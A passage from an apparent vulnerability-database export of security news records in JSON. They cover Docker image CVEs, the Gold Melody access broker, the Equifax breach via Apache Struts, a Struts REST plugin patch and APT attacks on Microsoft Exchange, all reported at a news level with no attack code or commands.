 * [**CVE-2021-29441**](<https://nvd.nist.gov/vuln/detail/CVE-2021-29441>) (CVSS score: 9.8) - Alibaba Nacos AuthFilter authentication bypass vulnerability
 * [**CVE-2020-14179**](<https://nvd.nist.gov/vuln/detail/CVE-2020-14179>) (CVSS score: 5.3) - Atlassian Jira information disclosure vulnerability
 * [**CVE-2013-4547**](<https://nvd.nist.gov/vuln/detail/CVE-2013-4547>) (CVSS score: 8.0) - Nginx crafted URI string handling access restriction bypass vulnerability
 * [**CVE-2019-0230**](<https://nvd.nist.gov/vuln/detail/CVE-2019-0230>) (CVSS score: 9.8) - Apache Struts 2 RCE vulnerability
 * [**CVE-2018-11776**](<https://nvd.nist.gov/vuln/detail/CVE-2018-11776>) (CVSS score: 8.1) - Apache Struts OGNL expression RCE vulnerability
 * [**CVE-2020-7961**](<https://nvd.nist.gov/vuln/detail/CVE-2020-7961>) (CVSS score: 9.8) - Liferay Portal untrusted deserialization vulnerability

Even more troublingly, the 15 most commonly used Docker images on the official Docker Hub repository have been revealed to harbor hundreds of vulnerabilities across python, node, wordpress, golang, nginx, postgres, influxdb, httpd, mysql, debian, memcached, redis, mongo, centos, and rabbitmq, underscoring the need to [secure containers](<https://www.trendmicro.com/vinfo/us/security/news/security-technology/container-security-examining-potential-threats-to-the-container-environment>) from a wide range of potential threats at each stage of the development pipeline.

"Users and organizations should always apply security best practices, which include utilizing the security by design approach, deploying multilayered virtual patching or vulnerability shielding, employing the principle of least privilege, and adhering to the shared responsibility model," the researchers concluded.

(The Hacker News, record last seen 2023-09-21; the title is not included in this excerpt)
"A financially motivated threat actor has been outed as an **initial access broker** (IAB) that sells access to compromised organizations for other adversaries to conduct follow-on attacks such as ransomware.\n\nSecureWorks Counter Threat Unit (CTU) has dubbed the e-crime group [Gold Melody](<https://www.secureworks.com/research/threat-profiles/gold-melody>), which is also known by the names Prophet Spider (CrowdStrike) and UNC961 (Mandiant).\n\n\"This financially motivated group has been active since at least 2017, compromising organizations by exploiting vulnerabilities in unpatched internet-facing servers,\" the cybersecurity company [said](<https://www.secureworks.com/research/gold-melody-profile-of-an-initial-access-broker>).\n\n\"The victimology suggests opportunistic attacks for financial gain rather than a targeted campaign conducted by a state-sponsored threat group for espionage, destruction, or disruption.\"\n\nGold Melody has been [previously](<https://www.crowdstrike.com/blog/prophet-spider-exploits-oracle-weblogic-to-facilitate-ransomware-activity/>) [linked](<https://www.crowdstrike.com/blog/prophet-spider-exploits-citrix-sharefile/>) to [attacks](<https://www.mandiant.com/resources/blog/mobileiron-log4shell-exploitation>) exploiting security flaws in JBoss Messaging (CVE-2017-7504), Citrix ADC (CVE-2019-19781), Oracle WebLogic (CVE-2020-14750 and CVE-2020-14882), GitLab (CVE-2021-22205), Citrix ShareFile Storage Zones Controller (CVE-2021-22941), Atlassian Confluence (CVE-2021-26084), ForgeRock AM (CVE-2021-35464), and Apache Log4j (CVE-2021-44228) servers.\n\nThe cybercrime group has been observed expanding its 
victimology footprint to strike retail, health care, energy, financial transactions, and high-tech organizations in North America, Northern Europe, and Western Asia as of mid-2020.\n\nMandiant, in an analysis published in March 2023, said that \"in multiple instances, UNC961 intrusion activity has preceded the deployment of Maze and Egregor ransomware from distinct follow-on actors.\"\n\nIt further [described](<https://www.mandiant.com/resources/blog/unc961-multiverse-financially-motivated>) the group as \"resourceful in their opportunistic angle to initial access operations\" and noted it \"employs a cost-effective approach to achieve initial access by exploiting recently disclosed vulnerabilities using publicly available exploit code.\"\n\nBesides relying on a diverse arsenal comprising web shells, built-in operating system software, and publicly available utilities, it's known to employ proprietary remote access trojans (RATs) and tunneling tools such as GOTROJ (aka MUTEPUT), BARNWORK, HOLEDOOR, DARKDOOR, AUDITUNNEL, HOLEPUNCH, LIGHTBUNNY, and HOLERUN to execute arbitrary commands, gather system information, and establish a reverse tunnel with a hard-coded IP address.\n\nSecureworks, which linked Gold Melody to five intrusions between July 2020 and July 2022, said these attacks entailed the abuse of a different set of flaws, including those impacting Oracle E-Business Suite ([CVE-2016-0545](<https://nvd.nist.gov/vuln/detail/CVE-2016-0545>)), Apache Struts ([CVE-2017-5638](<https://www.synopsys.com/blogs/software-security/cve-2017-5638-apache-struts-vulnerability-explained.html>)), Sitecore XP ([CVE-2021-42237](<https://blog.assetnote.io/2021/11/02/sitecore-rce/>)), and Flexera FlexNet ([CVE-2021-4104](<https://thehackernews.com/2021/12/new-local-attack-vector-expands-attack.html>)) to obtain initial access.\n\nA successful foothold is followed by the deployment of web shells for persistence, then by the creation of directories on the compromised host to stage the tools used in the infection chain.\n\n\"Gold Melody conducts a considerable amount of scanning to understand a victim's environment,\" the company said. \"Scanning begins shortly after gaining access but is repeated and continued throughout the intrusion.\"\n\nThe reconnaissance phase paves the way for credential harvesting, lateral movement, and data exfiltration. That said, all five attacks ultimately proved to be unsuccessful.\n\n\"Gold Melody acts as a financially motivated IAB, selling access to other threat actors,\" the company concluded. \"The buyers subsequently monetize the access, likely through extortion via ransomware deployment.\"\n\n\"Its reliance on exploiting vulnerabilities in unpatched internet-facing servers for access reinforces the importance of robust patch management.\"\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2023-09-21T09:11:00", "type": "thn", "title": "Cyber Group 'Gold Melody' Selling Compromised Access to Ransomware Attackers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0545", "CVE-2017-5638", "CVE-2017-7504", "CVE-2019-19781", "CVE-2020-14750", "CVE-2020-14882", "CVE-2021-22205", "CVE-2021-22941", "CVE-2021-26084", "CVE-2021-35464", "CVE-2021-4104", "CVE-2021-42237", "CVE-2021-44228"], "modified": "2023-09-21T09:11:14", "id": "THN:3E5F28AD1BE3C9B2442EA318E6E13E5C", "href": "https://thehackernews.com/2023/09/cyber-group-gold-melody-selling.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2018-10-06T22:53:10", "description": "Equifax said the culprit behind [this summer\u2019s massive breach of 143 million Americans](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>) was indeed CVE-2017-5638, an 
Apache Struts vulnerability patched back in March.\n\nThe bug was widely assumed by experts to be the \u201cU.S. website application vulnerability\u201d implicated by the company last Thursday, especially after an Apache spokeswoman [told Reuters](<https://www.reuters.com/article/us-equifax-cyber/criticism-of-equifax-data-breach-response-mounts-shares-tumble-idUSKCN1BJ1NF>) on Friday that it appeared the consumer credit reporting agency hadn\u2019t applied patches for flaws discovered earlier this year.\n\nOn Wednesday the company specified the flaw in a statement [posted to its site](<https://www.equifaxsecurity2017.com/>) and stressed it was continuing to work alongside law enforcement to investigate the incident.\n\n> \u201cEquifax has been intensely investigating the scope of the intrusion with the assistance of a leading, independent cybersecurity firm to determine what information was accessed and who has been impacted. We know that criminals exploited a U.S. website application vulnerability. The vulnerability was Apache Struts CVE-2017-5638. We continue to work with law enforcement as part of our criminal investigation, and have shared indicators of compromise with law enforcement.\u201d\n\nUntil the news broke on Wednesday, there was still mounting confusion over which Struts vulnerability attackers used.\n\nRen\u00e9 Gielen, vice president of the Apache Struts Project Management Committee (PMC) at the Apache Software Foundation, [wrote in an open letter over the weekend](<https://threatpost.com/apache-foundation-refutes-involvement-in-equifax-breach/127910/>) that attackers either used an unknown Struts zero day or an earlier announced vulnerability. 
A separate remote code execution bug, CVE-2017-9805, was fixed in Struts [last Tuesday](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>) but Gielen said the Apache PMC would have known about it if it was being exploited in July.\n\nAn internal report last week from equity research firm Baird said a Struts vulnerability was behind the breach as well. The analyst who penned the report failed to specify which vulnerability and neglected to state how he arrived at that conclusion however.\n\nJeff Williams, chief technology officer of Contrast Security, wrote last Saturday that CVE-2017-5638 was likely to blame for the breach.\n\n\u201cThe first vulnerability from March seems much more likely because it\u2019s easier to exploit and much better known. It also fits the timeline better, since it was released months before Equifax was attacked in July,\u201d Williams wrote, adding on Thursday that he was familiar with several large organizations which took months to fix the bug.\n\n\u201cThe process of rewriting, retesting, and redeploying can take months. I just visited one of the largest telecom providers where this effort took more than four months and millions of dollars. Without runtime protection in place, they have to do this every time a new library vulnerability comes out,\u201d Williams said.\n\nThe vulnerability, a flaw in the Jakarta Multipart parser upload function in Apache, allowed an attacker to make a maliciously crafted request to an Apache webserver. The vulnerability, which first surfaced on Chinese forums before it was discovered by researchers with Cisco Talos, [was patched back in March](<https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/>) but proof of concept exploit code quickly found its way into Metasploit. 
Public scans and attacks spiked immediately following disclosure of the vulnerability and at least one campaign was found [installing Cerber ransomware](<https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/>) on vulnerable servers.\n\nFamed cryptographer Bruce Schneier, CTO of IBM Resilient, [weighed in](<https://www.schneier.com/blog/archives/2017/09/on_the_equifax_.html>) on the Equifax fiasco on Wednesday and like IoT issues as of late [have necessitated](<https://threatpost.com/legislation-proposed-to-secure-connected-iot-devices/127152/>), suggested the only solution to preventing breaches like this from happening again is government intervention.\n\n\u201cBy regulating the security practices of companies that store our data, and fining companies that fail to comply, governments can raise the cost of insecurity high enough that security becomes a cheaper alternative,\u201d Schneier wrote, \u201cThey can do the same thing by giving individuals affected by these breaches the ability to sue successfully, citing the exposure of personal data itself as a harm.\u201d\n\nFittingly, as if to get the ball rolling, on Wednesday U.S. Sen. 
Mark Warner (D-VA) asked the Federal Trade Commission to look into the breach and the company\u2019s security practices, namely whether Equifax has adequate cybersecurity safeguards in place for the amount of personally identifiable information it deals with.\n\n\u201cThe volume and sensitivity of the data potentially involved in this breach raises serious questions about whether firms like Equifax adequately protect the enormous amounts of sensitive data they gather and commercialize,\u201d [Warner wrote](<https://www.scribd.com/document/358810691/Sen-Warner-Asks-FTC-to-Probe-Equifax>), \u201cIn ways similar to the financial service industry\u2019s systemic risk designation, I fear that firms like Equifax may illustrate a set of institutions whose activities, left unchecked, can significantly threaten the economic security of Americans.\u201d\n\nThe letter came a few days after members of the U.S. Senate Finance Committee, including Sen. Orrin Hatch (R-UT) and Ron Wyden (D-Ore.) sent another letter to Equifax CEO Richard Smith asking for additional information about the breach.\n\n\u201cThe scope and scale of this breach appears to make it one of the largest on record, and the sensitivity of the information compromised may make it the most costly to taxpayers and consumers,\u201d the senators wrote in a [letter](<https://www.finance.senate.gov/download/91117-equifax-release>) on Monday.\n\nWhile the FTC doesn\u2019t typically comment on ongoing investigations the Commission did confirm Thursday afternoon because of the \u201cintense public interest\u201d and \u201cpotential impact of this matter,\u201d it was looking into the breach.\n\nEquifax said Americans and an undisclosed number of Canadian and United Kingdom residents were affected by the breach but security news site [KrebsonSecurity.com](<https://krebsonsecurity.com/2017/09/ayuda-help-equifax-has-my-data/>) said this week Argentinans may be implicated as well. 
Brian Krebs, who authors the site, claims he was contacted by Alex Holden, who runs the firm Hold Security, earlier this week. Two of Holden\u2019s employees, native Argentinans, discovered an Equifax portal for employees in Argentina that included their names, email addresses, and DNI \u2013 the Argentinian equivalent of a Social Security Number.\n\nThe site, according to Holden \u201cwas wide open, protected by perhaps the most easy-to-guess password combination ever: \u201cadmin/admin.\u201d Krebs claims the portal was disabled upon notifying Equifax\u2019s attorney and that the company is looking into how it may have been left unsecured.\n", "cvss3": {}, "published": "2017-09-14T16:00:34", "type": "threatpost", "title": "Equifax Confirms March Struts Vulnerability Behind Breach", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2017-9805"], "modified": "2017-09-15T13:01:13", "id": "THREATPOST:9E84C27A33C751DE6ECC9BAAF9C0F19B", "href": "https://threatpost.com/equifax-confirms-march-struts-vulnerability-behind-breach/127975/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:11", "description": "The Apache Software Foundation has patched a critical remote code execution vulnerability affecting all versions of the popular application development framework Struts since 2008.\n\nAll web applications using the framework\u2019s REST plugin are vulnerable. Users are advised to upgrade their Apache Struts components as a matter of urgency, according to Semmle, a software engineering analytics firm that first identified the bug.\n\n\u201cThis particular vulnerability allows a remote attacker to execute arbitrary code on any server running an application built using the Struts framework and the popular REST communication plugin. 
The weakness is caused by the way Struts deserializes untrusted data,\u201d the company wrote in [a technical write-up](<https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement>) on the vulnerability published on Tuesday in coordination with the release of a patch by Apache Software Foundation (ASF).\n\n\u201cThis is as serious as it gets; if remote attackers are allowed to exploit the newly identified vulnerability it can critically damage thousands of enterprises,\u201d said Oege de Moor, CEO and founder of Semmle.\n\nAffected developers are urged to [upgrade to Apache Struts version 2.5.13](<https://struts.apache.org/announce.html#a20170905>).\n\nThe ASF said there is no workaround available for the vulnerability ([CVE-2017-9805](<https://struts.apache.org/docs/s2-052.html>)) in Struts, an open-source framework for developing web applications in the Java programming language.\n\n\u201cThe best option (sans an upgrade) is to remove the Struts REST plugin when not used or limit it to server normal pages and JSONs only,\u201d the ASF wrote in a [security bulletin issued Tuesday](<https://struts.apache.org/docs/s2-052.html>).\n\nSemmle cites estimates the vulnerability could impact 65 percent of the Fortune 100 companies that use web applications built with the Struts framework.\n\n\u201cOrganizations like Lockheed Martin, the IRS, Citigroup, Vodafone, Virgin Atlantic, Reader\u2019s Digest, Office Depot, and Showtime are known to have developed applications using the framework. This illustrates how widespread the risk is,\u201d Semmle researcher Bas van Schaik wrote Tuesday, citing estimates by analysts at the software developer research firm RedMonk.\n\nMultiple similar vulnerabilities have been reported tied to Struts. 
Earlier this year, attackers were exploiting a critical Apache Struts vulnerability on Windows servers and dropping Cerber ransomware on the machines.\n\n[In March](<https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/>), public attacks and scans looking for exposed Apache webservers were reportedly on the rise after a vulnerability ([CVE-2017-5638](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638>)) in the Struts 2 web application framework was [patched](<https://cwiki.apache.org/confluence/display/WW/S2-045>) and proof-of-concept exploit code was introduced into Metasploit.\n\nSemmle said this most recent vulnerability is caused by the way Struts deserializes untrusted data. Deserialization is the process of taking structured data from one format and rebuilding it into an object. The process can be tweaked for malicious intent and has been used in a host of attack scenarios including denial-of-service, access control and remote code execution attacks.\n\nThe remote code execution attack Semmle identified is possible when using the Struts REST plugin with the XStream handler to facilitate XML payloads. XStream is a Java library used to serialize objects to XML (or JSON) and back again.\n\n\u201cLgtm (Semmle\u2019s open-source [code analysis tool](<https://lgtm.com/>)) identifies alerts in code using queries written in a specially-designed language: QL. One of the many queries for Java detects potentially unsafe deserialization of user-controlled data. The query identifies situations in which unsanitized data is deserialized into a Java object. 
This includes data that comes from an HTTP request or from any other socket connection,\u201d Semmle said in a [second technical analysis of the vulnerability](<https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement>) posted Tuesday.\n\nData contained in one of the arguments (toObject) should be considered \u201ctainted\u201d and \u201cunder the control of a remote user and should not be trusted.\u201d This query detects common ways through which user-controlled data flows to a deserialization method, researchers said. \u201cHowever, some projects use a slightly different approach to receive remote user input,\u201d they said.\n\nSemmle said it has developed a \u201csimple\u201d working exploit for this vulnerability but currently has no plans to disclose it.\n\n\u201cThere is no suggestion that an exploit is publicly available, but it is likely that one will soon be,\u201d van Schaik wrote in a blog post.\n", "cvss3": {}, "published": "2017-09-05T14:10:54", "type": "threatpost", "title": "Patch Released for Critical Apache Struts Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2017-9805"], "modified": "2017-09-05T18:44:40", "id": "THREATPOST:7DFB677F72D6258B3CDEE746C764E29E", "href": "https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:10", "description": "A group of developers behind Apache Struts, believed by some to be the culprit behind [last week\u2019s Equifax breach](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>), took umbrage with those claims over the weekend.\n\nRen\u00e9 Gielen, vice president of the Apache Struts Project Management Committee (PMC) at the Apache Software Foundation, wrote Saturday that if Struts was targeted, it\u2019s unclear which vulnerability, if any was exploited.\n\n[The 
letter,](<https://blogs.apache.org/foundation/entry/apache-struts-statement-on-equifax>) which was written on behalf of the Struts PMC, was spurred by an internal analyst report published last week that suggested data from Equifax\u2019s servers was breached via an unnamed Apache Struts flaw.\n\nThe report penned by Jeffrey Meuler, a senior research analyst with Baird Equity Research, the research arm of the financial services firm Robert W. Baird & Co, did not provide a source for the finding. Meuler did not immediately return a request for further comment when contacted on Monday.\n\nGielen\u2019s letter took particular issue with a Quartz.com article that initially alleged CVE-2017-9805, a critical remote code execution vulnerability that the ASF [patched last Tuesday](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>), was the Struts vulnerability to blame for the breach of 143 million Americans\u2019 records. The [Quartz article](<https://qz.com/1073221/the-hackers-who-broke-into-equifax-exploited-a-nine-year-old-security-flaw/>) \u2013 since edited \u2013 initially claimed that CVE-2017-9805 had existed in the wild for nine years, something Gielen had a hard time buying. Gielen said Saturday that since the breach was detected back in July, it\u2019s likely the Equifax attackers either used an unknown Struts zero day or an earlier announced vulnerability on an unpatched Equifax server.\n\nGielen says the ASF takes \u201cenormous efforts\u201d to secure software it produces, like Struts, and makes a conscious effort to hold back sensitive information around vulnerabilities. 
There is no silver bullet for preventing exploits from surfacing in the wild however.\n\n\u201cSince vulnerability detection and exploitation has become a professional business, it is and always will be likely that attacks will occur even before we fully disclose the attack vectors, by reverse engineering the code that fixes the vulnerability in question or by scanning for yet unknown vulnerabilities.\u201d\n\nIf the attackers had used CVE-2017-9805, it would have been considered a zero day at the time, but according to Gielen, the Apache PMC was only recently notified of the vulnerability \u2013 something it quickly remedied.\n\n\u201cWe were notified just recently on how a certain piece of code can be misused, and we fixed this ASAP,\u201d Gielen said, \u201cWhat we saw here is common software engineering business \u2014 people write code for achieving a desired function, but may not be aware of undesired side-effects. Once this awareness is reached, we as well as hopefully all other library and framework maintainers put high efforts into removing the side-effects as soon as possible. It\u2019s probably fair to say that we met this goal pretty well in case of CVE-2017-9805.\u201d\n\nGielen concluded his letter with a series of best practices for businesses who use Apache Struts to follow, including being aware which framework/libraries are used in their setup, that processes to roll out security fixes are established, and perhaps most importantly, to understand that complex software can contain flaws.\n\nAn Apache spokeswoman [told Reuters on Friday](<https://www.reuters.com/article/us-equifax-cyber/criticism-of-equifax-data-breach-response-mounts-shares-tumble-idUSKCN1BJ1NF>) that it appeared Equifax had not applied patches for flaws discovered this year.\n\nIt\u2019s unclear exactly which vulnerability the spokeswoman was referring to. The Struts vulnerability fixed last week affected all web apps that used the framework\u2019s REST plugin. 
Another Struts vulnerability, CVE-2017-5638, was publicized and incorporated into Metasploit [in March](<https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/>). That flaw stemmed from Struts\u2019 Jakarta Multipart parser upload functionality and allowed an attacker to execute requests to an Apache webserver. Researchers with Cisco Talos, [who found the bug](<http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html>), said it was being exploited in the wild when it was disclosed.\n\nResearchers with Contrast Security posit it\u2019s more likely the attacker used CVE-2017-5638, an expression language injection vulnerability leveraged via the content-type header, to hit Equifax.\n\n\u201cThe first vulnerability from March seems much more likely because it\u2019s easier to exploit and much better known. It also fits the timeline better, since it was released months before Equifax was attacked in July,\u201d Jeff Williams, Contrast\u2019s co-founder and chief technology officer, [wrote Saturday](<https://www.contrastsecurity.com/security-influencers/a-week-of-web-application-hacks-and-vulnerabilities>).\n\nWilliams echoed a few sentiments made by Gielen, including the fact that maintaining the security of libraries can be tricky but should remain a focus for businesses.\n\n\u201cKeeping libraries up to date isn\u2019t a small amount of work, as these changes come out frequently. Often these changes require rewriting, retesting, and redeploying the application, which can take months. 
I have recently talked with several large organizations that took over four months to deal with CVE-2017-5638,\u201d Williams said.\n\nEquifax, which has yet to respond to a request for comment for this article or [previous](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>) [articles](<https://threatpost.com/many-questions-few-answers-for-equifax-breach-victims/127886/>), remains in damage control mode.\n\nThe company on Monday said it would be changing how it generates PINs for customers who want to initiate a security freeze on their accounts. The move was presumably a response to a series of tweets that went viral on Friday night calling out Equifax for using hardcoded PINs that mirrored the date and time they were requested, a format the company allegedly has followed for more than a decade.\n\n> OMG, Equifax security freeze PINs are worse than I thought. If you froze your credit today 2:15pm ET for example, you'd get PIN 0908171415.\n> \n> \u2014 Tony Webster (@webster) [September 9, 2017](<https://twitter.com/webster/status/906346071210778625>)\n\nThe company said in an update to its site that going forward consumers placing a security freeze will be given a randomly generated PIN. Users who previously froze their credit will have to mail the company directly to change it, however.\n\n> Equifax's security freeze system is now generating random PINs. If you already got one though, you have to MAIL them to change it. Fail. 
[pic.twitter.com/fOrtvgkmGd](<https://t.co/fOrtvgkmGd>)\n> \n> \u2014 Tony Webster (@webster) [September 11, 2017](<https://twitter.com/webster/status/907242378829889537>)\n\nThe company on Monday also apologized for lengthy call center wait times and stressed that users who sign up for TrustedID Premier, the company\u2019s ID theft protection and credit monitoring service, will not be charged as soon as the year runs out.\n\nThe company also took a moment on Monday to reiterate that signing up for the free credit monitoring service doesn\u2019t waive a consumer\u2019s right to take legal action.\n\nThe company clarified its TrustedID Premier policy on Friday afternoon after it was pressed repeatedly by consumers and politicians alike. One politician in particular, Eric Schneiderman, New York\u2019s Attorney General, opened a formal investigation into the breach on Friday, calling out the company\u2019s arbitration clause policy.\n\nAs expected, multiple lawsuits have been filed against the company in the wake of the breach. One class action suit, filed late Thursday night, alleges Equifax \u201cnegligently failed to maintain adequate technological safeguards to protect [the plaintiffs\u2019] information from unauthorized access by hackers.\u201d The suit seeks as much as $70 billion in damages nationally.\n\n\u201cEquifax knew and should have known that failure to maintain adequate technological safeguards would eventually result in a massive data breach,\u201d the complaint also reads.\n\n_*This article was updated at 5 p.m. 
to include insight from Contrast Security re: CVE-2017-5638 and Equifax._\n", "cvss3": {}, "published": "2017-09-11T15:02:31", "type": "threatpost", "title": "Apache Foundation Refutes Involvement in Equifax Breach", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2017-9805"], "modified": "2017-09-20T19:57:18", "id": "THREATPOST:477B6029652B76463B5C5B7155CDF736", "href": "https://threatpost.com/apache-foundation-refutes-involvement-in-equifax-breach/127910/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-10-19T15:15:21", "description": "New, sophisticated adversaries are switching up their tactics in exploiting enterprise-friendly platforms \u2014 most notably Microsoft Exchange, Outlook Web Access (OWA) and Outlook on the Web \u2013 in order to steal business credentials and other sensitive data.\n\nBoth Microsoft\u2019s Exchange mail server and calendaring server and its Outlook personal information manager web app provide authentication services \u2013 and integration with other platforms \u2013 that researchers say are prime for attackers to leverage for launching attacks.\n\nAccenture\u2019s 2020 Cyber Threatscape report, released Monday, shed light on how actors are leveraging Exchange and OWA \u2013 and evolving their tactics to develop new malware families that target these services, or using new detection evasion techniques.\n\n\u201cWeb-facing, data-intense systems and services that typically communicate externally can make it easier for adversaries to hide their traffic in the background noise, while authentication services could open up a credential-harvesting opportunity for cybercriminals,\u201d according to [Accenture researchers on 
Monday](<https://newsroom.accenture.com/news/state-sponsored-hackers-and-ransomware-gangs-are-diversifying-tactics-to-inflict-more-harm-according-to-accenture-report.htm>).\n\n## **APTs Flock Exchange, OWA**\n\nOne threat group that has been targeting Exchange and OWA is what researchers dub \u201cBELUGASTURGEON\u201d (aka [Turla or Whitebear](<https://threatpost.com/turla-apt-revamps-comrat/156051/>)). Researchers say that this [group operates from Russia](<https://threatpost.com/turla-compromises-iranian-apt/149375/>), has been active for more than 10 years and is associated with numerous cyberattacks aimed at government agencies, foreign-policy research firms and think tanks across the globe.\n\nThe group is targeting these Microsoft services and using them as beachheads to hide traffic, relay commands, compromise e-mail, exfiltrate data and gather credentials for future espionage attacks, said researchers. For instance, they are manipulating legitimate traffic that\u2019s traversing Exchange in order to relay commands or exfiltrate sensitive data.\n\n\u201cHosts supporting Exchange and associated services frequently relay large volumes of data to external locations\u2014 representing a prime opportunity for malicious actors to hide their traffic within this background noise,\u201d said researchers.\n\nAnother group, which researchers call SOURFACE (aka [APT39 or Chafer](<https://threatpost.com/chafer-apt-hits-middle-east-govs-with-latest-cyber-espionage-attacks/156002/>)), appears to have developed similar techniques to conceal malicious traffic, manipulating local firewalls and proxying traffic over non-standard ports using native commands, tools and functions, researchers said. Researchers said this group has been active since at least 2014 and is known for its cyberattacks on the oil and gas, communications, transportation and other industries in Australia, Europe, Israel, Saudi Arabia, the U.S. 
and other regions.\n\nIn addition, threat groups are also creating new malware designed to specifically target Exchange and OWA. Researchers said they discovered several malicious files in the wild in 2019 that they assessed \u201cwith moderate confidence\u201d were associated with a group called BLACKSTURGEON, used in targeting government and public sector orgs.\n\nThat includes a file that seemed like a version of the group\u2019s [customized version of the \u201cRULER\u201d tool,](<https://www.hacking.land/2016/10/ruler-tool-to-abuse-exchange-services.html?m=1>) which is designed to abuse Microsoft Exchange services. This file exploits the [CVE-2017-11774 Outlook vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11774>), a security-feature bypass vulnerability that affects Microsoft Outlook and enables attackers to execute arbitrary commands, researchers said.\n\n## **Other Services Under Attack**\n\nCybercriminals are also targeting services that support Exchange and OWA. For instance, client-access servers (CAS), which handle all client connections to Exchange Server 2010 and Exchange 2013, typically operate in web-login portals for services including OWA. Attackers with access to CAS may be able to deploy capabilities to steal user login credentials, researchers said.\n\n\u201cNotably, an advanced persistent threat actor reportedly deployed web shells to harvest credentials from OWA users as they logged in,\u201d they said.\n\nThe Windows Internet Information Services (IIS) platform, which supports OWA, is another increasing target. IIS is web server software created by Microsoft for use with the Windows family. Researchers said they have observed SOURFACE, for instance, deploying custom Active Server Page Extended (ASPX) Web shells to IIS directories within the victim\u2019s OWA environment. 
These web shells would include discreet file names, to resemble legitimate files on the victim\u2019s system (for instance \u201clogin2.aspx\u201d instead of \u201clogin.aspx\u201d). And, to evade static detection, they typically contained limited functionality, often only file upload and download or command execution.\n\n\u201cSOURFACE operators altered their approach as the intrusion progressed. Instead of placing additional files to accomplish malicious functionality, the adversary appended web shell code to legitimate files within IIS,\u201d said researchers. \u201cIt is likely they did this to reduce the identification by network defenders and ensure persistent access, even if other web shell files were identified and removed.\u201d\n\nResearchers said moving forward, attackers will continue to innovate their techniques in attacking Microsoft services, like Exchange, in ways that will naturally challenge network defenders. Beyond malware, [Microsoft is top of the heap](<https://threatpost.com/microsoft-most-imitated-phishing/160255/>) when it comes to hacker impersonations \u2013 with Microsoft products and services featuring in nearly a fifth of all global brand phishing attacks in the third quarter of this year, according to Check Point researchers.\n\n\u201cState-aligned operators could continue \u2014 in most cases \u2014 to need to emphasize stealth and persistence to meet their intelligence-gathering goals,\u201d according to Accenture. 
\u201cSuch capabilities and detection evasion approaches underline the importance of identifying and tracking priority adversaries and then threat hunting against the specific behaviors employed by the priority adversaries.\u201d\n", "cvss3": {}, "published": "2020-10-19T15:09:06", "type": "threatpost", "title": "Microsoft Exchange, Outlook Under Siege By APTs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11774"], "modified": "2020-10-19T15:09:06", "id": "THREATPOST:BF27EB1E464BD713B35779742C991C59", "href": "https://threatpost.com/microsoft-exchange-outlook-apts/160273/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-11T11:42:25", "description": "Equifax will pay as much as $700 million to settle federal and state investigations on the heels of its infamous 2017 breach, which exposed the data of almost 150 million customers.\n\nThe consumer credit reporting agency on Monday [said](<https://investor.equifax.com/news-and-events/news/2019/07-22-2019-125543228>) it will dish out $300 million to cover free credit monitoring services for impacted consumers, $175 million to 48 states in the U.S, and $100 million in civil penalties to the Consumer Financial Protection Bureau (CFPB). If the initial amount does not cover consumer losses, the company may need to pay an additional $125 million.\n\n\u201cCompanies that profit from personal information have an extra responsibility to protect and secure that data,\u201d said Federal Trade Commission (FTC) Chairman Joe Simons [in a statement](<https://www.ftc.gov/news-events/press-releases/2019/07/equifax-pay-575-million-part-settlement-ftc-cfpb-states-related?utm_source=slider>). \u201cEquifax failed to take basic steps that may have prevented the breach that affected approximately 147 million consumers. 
